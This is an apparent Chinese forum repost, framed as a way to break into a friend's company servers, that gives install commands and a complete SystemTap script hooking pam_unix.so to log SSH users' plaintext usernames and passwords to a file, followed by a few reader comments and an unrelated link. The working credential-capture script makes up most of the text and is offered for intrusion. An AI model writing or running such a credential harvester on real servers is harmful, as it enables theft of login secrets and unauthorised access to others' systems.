使用systemtap抓取ssh登录的用户名和密码

渗透朋友公司的服务器，知道了ssh密码都是通用的，但是不知道ssh密码，怎么办呢

于是谷歌了半天，发现了一些东西

==================

原文：http://www.ttlsa.com/html/3910.html

systemtap是一款非常强大内核调试工具，可以debug很多关于kernel层的问题。Linux是通过PAM模块检测用户信息和认证信息的，从 而确定一个用户是否可以登录系统，利用这个知识点，使用systemtap捕获一下pam_unix.so该动态库文件的函数调用，获得用户在ssh远程 登录时的用户名和密码吧。

测试环境：CentOS6.4 32bit

内核版本：2.6.32-358.el6.i686

首先安装以下rpm包

# yum --releasever=6.4 update
# yum install -y systemtap
# debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

创建文件，写入以下代码

# touch /root/capture_pass.stp
#!/usr/bin/stap
global username, pass, isSuccRet = 1;
probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
{
username = user_string($name);
pass = user_string($p);
}
probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
{
if ($return == 0)
{
printf("User: %snPassword: %snn", username, pass);
isSuccRet = 0;
}
}
probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
{
if (isSuccRet != 0)
{
printf("Login via ssh service.nUser: %snPassword: %snn", username, pass);
}
isSuccRet = 1;
}

赋予可执行权限

chmod +x capture_pass.stp

创建一个记录密码的文件

touch password.txt

执行systemstap脚本

stap capture_pass.stp -o password.txt

本地执行capture_pass.stp脚本，同时ssh远程登录系统，即使第一次登录失败也没有问题，不会记录尝试输入的错误密码。登录成功后 ctl+C终止脚本运行，查看password.txt，成功捕获。systemstap很强大的利器，所以只有超户可以使用。

Linux ****** 2.6.18-308.1.1.el5PAE #1 SMP Wed Mar 7 04:57:46 EST 2012 i686 i686 i386 GNU/Linux

测试通过

[原文地址]

相关吐槽：

1#

xsjswt | 2013-12-24 17:32

systemtap是个好东西,不过拿来干这种事情,着实有点过于猥琐

2#

xsjswt | 2013-12-24 17:33

建议转到我们都是猥琐流? @xsser

3#

乐乐、 (一如乌云深似海 从此马甲是路人) | 2013-12-25 09:54

我是来看头像的~

4#

核攻击 (统治全球，奴役全人类！毁灭任何胆敢阻拦的有机生物！) | 2013-12-25 10:41

猥琐 +10086

文章来源于lcx.cc:使用systemtap抓取ssh登录的用户名和密码

相关推荐: 金融改革记录片(97% Owned)－97%被私人银行占据的无中生有债务货币

金融改革紀錄片97%owned中文字幕 「97% Owned展现出对於我们经济和金融体系严肃研究且可证实的证据。这是首部从英国观点对於此议题的记录片，并解释了中央银行以及金钱创造过程的内在运作。 当金钱驱动著几乎所有这颗星球上的所有活动时，重要的是我们要了解金…